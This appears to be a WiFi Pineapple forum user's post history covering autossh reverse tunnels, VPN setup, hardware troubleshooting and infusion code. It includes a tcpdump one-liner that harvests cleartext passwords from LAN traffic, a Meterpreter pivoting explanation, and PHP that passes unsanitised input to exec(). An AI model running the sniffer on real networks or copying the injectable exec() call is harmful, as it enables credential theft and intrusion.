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Everything posted by fringes

  1. OK, if that's what you meant. I told you how to connect from your laptop through your VPS to the pineapple using the SSH tunnel. I thought that was your goal.
  2. Raz0r, I keep trying to catch you in IRC. I was trying to tell you in the other thread that your VPS (relay server) doesn't normally connect to your pineapple, it's the other way around. I've posted this in other topics, but my /etc/config/autossh "option ssh" line looks like: -i /root/.ssh/id_rsa -N -T -R 1471:localhost:1471 -R 2223:localhost:22 tunnel@my-server.org -p 222 To connect to my pineapple via Putty, I just created (and saved) root@localhost port 2223, and under the session's "local proxy command" I have: "C:\Program Files (x86)\PuTTY\plink.exe" my-server.org -P 222 -l tunnel-agent -nc %host:%port To browse to the pineapple, I create a "shortcut," that contains: "C:\Program Files (x86)\PuTTY\plink.exe" -N -L 1471:localhost:1471 tunnel@my-server.org -P 222 Then I browse to: http://localhost:1471 I hope this helps. (It's almost the same using an SSH client in Linux and you probably won't need the "-P 222"; my server is on a no-standard port.)
  3. Thanks Darren... FYI, the changes I made work well for me, but you or Seb might want that field to be optional. RE: re: openvpn - see the option ( push "redirect-gateway def1 bypass-dhcp")? That is what Untangle wouldn't do until recently. (They apparently do this via the new "Full Tunnel" option now. I haven't tried it.) You never resolved this on the show, and I was afraid you were connecting to your VPN, but weren't actually re-directing your internet traffic through it. I set up my own OpenVPN server the same way you did. The hardest part about the whole thing is the certificate management and distribution. I still use Untangle for some firewalls (when I'm not using Smoothwall Express). I'm really looking forward to the infusion; I'll be watching for it. The SSH tunnels will always be useful and I don't see the VPN replacing them for all purposes. I expect someone will find an application that requires a large database that they could not otherwise use without port forwarding the connection (-L) from a remote server. Oh and before I forget, there's a group of options you can add to the authorized_keys file on the server to prevent your server from being compromised should someone compromise your pineapple and get the SSH keys. I don't recall you covering them on the show when you did the SSH segments, so I thought it'd be a good idea to mention them.
  4. I (and a couple of others) had made some autossh infusion feature requests including multiple port forwards (-R and -L), different remote SSH port (-p), configuration backup, and multiple remote servers. I currently: use my key from /root/.ssh, port forward both SSH and 1471, and connect to my server on a non-standard SSH port (necessity, not choice). Since it looks like a lot of other items have higher priority, I thought I'd have a look at the existing system infusion myself to see what it would take. The existing code doesn't actually parse the /etc/config/autossh option ssh arguments, it just assumes each of the three arguments displayed are in a certain position. I had originally planned to see if I could improve the parsing of the args, but a simpler (stop-gap) measure seemed to just display/edit the entire argument list. I copy/pasted the relevant pieces of existing code and just tweaked them for my purposes. The $args= line just uses "uci show" (exactly like the other field parsers, except it grabs the entire arg list (everything after the "=" in the string returned by uci). I also added page refresh following the save. I tried to make as few changes as possible, while keeping the code style and techniques the same. Regarding "only one selected FieldSet/form active (Settings/Advanced Settings)," I just wanted either the advanced or default options displayed, not both at the same time. I'd just have to play with showing/hiding divs or tables, but I don't think that's even necessary now. So you're using OpenVPN with the pineapple? How's that working? We need an infusion for that. You did a segment (following your European tour) on switching to openVPN using Untangle. Some friends and I each tried to do that independently, and it seems that there was no way (via the UI) to get all client traffic to go through the tunnel. I believe they've finally fixed that with "full tunnel" option but I haven't tried it yet. Did you ever check your client IP after connecting? I ended up installing and configuring an openVPN server manually. It wasn't too difficult, you should do a show on that.
  5. This one I think: > (Since I cloned the system infusion, I had to adjust all the paths too.) This is to add an "advanced" feature to the AutoSSH infusion, it won't help you get started. Did you get anywhere with your problem? Did Darren's video help? Are you just trying to SSH to your pineapple via your VPS?
  6. And for those of us that are language challenged: http://crackmywifi.blogspot.com/2014/01/linset-010-wpa-2-brute-force-hack.html
  7. My "relay server" can't see my pineapple either. It's the other way around. If you have a port forward tunnel connected from the pineapple to your VPS (relay server), just connect from your laptop to that port on your VPS (assuming it's open). Darren did a Hak5 video (1112) on this. If you still need help, cat /etc/config/autossh and paste the "option ssh" line here. You should redact your server name/IP. As I've mentioned in another post, I tweaked the AutoSSH infusion to let me use additional options (and multiple tunnels) via the UI.
  8. I've submitted some autossh feature requests including this one to support multiple port forwards and alternate SSH server ports. I know Seb has a lot on his plate before getting to these, so I was messing around and cloned AutoSSH, adding an "Advanced Settings" feature (mostly copy/pasting). Obviously, I can continue to modify the /etc/config/autossh file manually, but I wondered if this idea would get any traction, as it's so simple to implement. Basically, I just modified includes/content/setup.php to add the following: $args = exec("uci show autossh.@autossh[0].ssh | cut -f2- -d'='"); and: <br /> <fieldset> <legend>Advanced Settings</legend> <form method="POST" action="/components/infusions/myautossh/functions.php?action=advancededit" id="advancedAutossh" onSubmit="$(this).AJAXifyForm(update_message); return fals <table> <tr><td>Advanced args:</td><td><input name='args' type='text' placeholder='<?=$args?>' value='<?=$args?>' size='150'</td></tr> <tr><td><input type='submit' name='submit' value='Save'></td></tr> </table> </form> </fieldset> And modified functions.php to add: if($_GET['action'] == "advancededit"){ echo save_args($_POST['args']); } and: function save_args($args){ exec('uci set autossh.@autossh[0].ssh="'.$args.'"'); exec('uci commit autossh'); return "<font color='lime'>AutoSSH configuration updated.</font>"; } How would I make only one selected FieldSet/form active (Settings/Advanced Settings)? I use autossh for more than one port forward (22 & 1471), and my SSH server port isn't 22. I'd also like to be able to access a remote mysql (-L 3306:localhost:3306). This feature allows me to do that from the UI. Any thoughts or comments?
  9. I believe Darren was suggesting something like this: echo "tcpdump port http or port ftp or port smtp or port imap or port pop3 -l -A -i br-lan | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd =|password=|pass:|user:|username:|password:|login:|pass |user ' -B20 > /tmp/plaintext_passwords.txt" | at now
  10. Well, the parabolic is very directional, is it pointing in the same direction as when you tested on the other adapters? Also, carefully examine the SMA adapter and its connection between your pigtail and the pineapple. Just grasping here.
  11. I read about someone trying to use the charger instead of the power supply, but I have no idea if that would cause your problems. I wouldn't think so, but you might check. They were shipping with defective SD cards for a while, but I wouldn't think that was the cause either. You could try starting over with a new SD card formatted ext4 though. (I replaced mine with a 32GB class-10.)
  12. Well, it was called Jammer. I uninstalled it so I could help you out and it is indeed gone. So I checked the forums and found this. You want the Deauth infusion.
  13. Hello. I must have missed that. What documentation says we have to register our SN for support? What that something specific to the hakshop perhaps? Come to think of it, I don't recall anything related to warranty registration either. I'd like to know if I failed to do something. Anyway, you can certainly get community support here without your SN, so ask away.
  14. Well, Shannon just got married, so give them a break. That's bound to be a bit disruptive. Do you want your money back, or do you want your pineapple to work? If it's the latter, there is a lot of help available here. Search these forums first before posting; someone else has almost certainly addressed your issue. If you still need help and have read Answers to common questions, then post a meaningful (polite) and detailed description of your problem.
  15. For the Network infusion, you might submit a request ticket for Seb. For Whistle Master's WiFi Manager, you might submit something to [support] WiFi Manager. Don't forget to add that saving to the /sd is a must.
  16. I'm not really sure what your issues are, so I'll try to give you some general help. I assume you opened the infusion, clicked "Help" and followed the instructions. You should have seen Metasploit sending the stage to your pineapple's IP and then opening a Meterpreter session. If so, you've pwned your pineapple. (If Kali is running in a VM, make sure it's using bridged network mode; the pineapple must be able to connect to it.) The meterpreter.php payload was installed with the infusion and can be found in the same directory tree, but that isn't relevant. You just need to start the correct handler (listener) in Metaspoit (e.g msfconsole) in Kali, point the infusion at it and click "Start." As far as what it "will do"... Conceptually, your pineapple might be physically placed on a target network behind a firewall. So having Meterpreter running on the pineapple gives you a foothold inside that network for scanning and "pivoting" to pursue other hosts via Metasploit.
  17. Yes, Firefox does that. What browser do you normally recommend for the pineapple? Do you really think a firmware upgrade is necessary for this, or are there other fixes you're going to incorporate? It seems to me that removing the "/" characters from all the infusion descriptions should be good enough until the next release. (I see you've already done this! Get some sleep Seb. ) Thanks for getting to this so quickly. I would have opened an issue, but I was already running late for work. PS: I just installed the Meterpreter infusion; good job.
  18. Same here. It's at the bottom of the list and when I click it... nothing, no pop-up. If it helps, this is the install link and the relevant JavaScript function:{%22id%22:%2291%22,%22name%22:%22meterpreter%22,%22version%22:%221.0%22,%22description%22:%22GUI+for+Meterpreter+reverse+TCP.+Accepts+lhost%2Flport.+Supports+start%2Fstop%2C+autostart+enable%2Fdisable.+Provides+a+persistent+remote+shell%2C+pivoting.%22,%22author%22:%22hak5darren%22,%22md5%22:%22c6c662c8ea36c4fb39bab00d2eb78c79%22,%22size%22:%224%22,%22type%22:%22inf%22,%22num_downloads%22:%223%22}/popup'>{%22id%22:%2291%22,%22name%22:%22meterpreter%22,%22version%22:%221.0%22,%22description%22:%22GUI+for+Meterpreter+reverse+TCP.+Accepts+lhost%2Flport.+Supports+start%2Fstop%2C+autostart+enable%2Fdisable.+Provides+a+persistent+remote+shell%2C+pivoting.%22,%22author%22:%22hak5darren%22,%22md5%22:%22c6c662c8ea36c4fb39bab00d2eb78c79%22,%22size%22:%224%22,%22type%22:%22inf%22,%22num_downloads%22:%223%22}/popup or{"id":"91","name":"meterpreter","version":"1.0","description":"GUI for Meterpreter reverse TCP. Accepts lhost/lport. Supports start/stop, autostart enable/disable. Provides a persistent remote shell, pivoting.","author":"hak5darren","md5":"c6c662c8ea36c4fb39bab00d2eb78c79","size":"4","type":"inf","num_downloads":"3"}/popup function handle_hash_change(hashValue){ //[0]:type - [1]:infusion_name - [2]:action - [3]:data - [4]:callback_function var hash_array = hashValue.replace(/#/g, '').split('/'); if(hash_array.length == 5){ //Correct size, carry on $.ajaxSetup({async:false}); if(hash_array[0] == "usr"){ $.get('/components/infusions/'+hash_array[1]+'/functions.php?'+hash_array[2]+'='+hash_array[3], function(data){ try{ window[hash_array[4]](data); }catch(err){ console.log("Function not found"); } }); }else if(hash_array[0] == "sys"){ $.get('/components/system/'+hash_array[1]+'/functions.php?'+hash_array[2]+'='+hash_array[3], function(data){ try{ window[hash_array[4]](data); }catch(err){ console.log("Function not found"); } }); } $.ajaxSetup({async:true}); } //reset url so that we can call the same link again. window.location='#'; } What appears to be happening is that "var hash_array = hashValue.replace(/#/g, '').split('/');" is resulting in an array of length 8 (instead of 5). It's splitting on the "/" characters in the description.
  19. Never mind. I saw your video in a different thread of a different battery and charger.
  20. Absolutely. From here (https://wifipineapple.com/), select "Bug Tracker" under "Support."
  21. Did you mean that to sound that way? I and most of the people here have high regard for Seb, Darren, and the rest of the gang, and the fine work they are producing. That said, I think what you are doing sounds like great fun, and is definitely in keeping with the spirit of the WiFi Pineapple. I look forward to watching how your endeavor progresses. Please keep us updated.
  22. Cotica, I thought attaching the pictures was a very good idea. And just for the record, the charger appears to be the correct one, but the battery switch was definitely in the wrong position. cheeto, The referenced battery has one red led and the charger has one red and one green. What am I missing?
  23. Excellent. I'm glad you were able to figure it out. Go ahead and add -R 2222:localhost:22 (or similar) and you'll have SSH access from anywhere too. Hopefully, the autossh Infusion will be updated to allow multiple entries, multiple port forwards (-L & -R), etc. Is your issue completely resolved?
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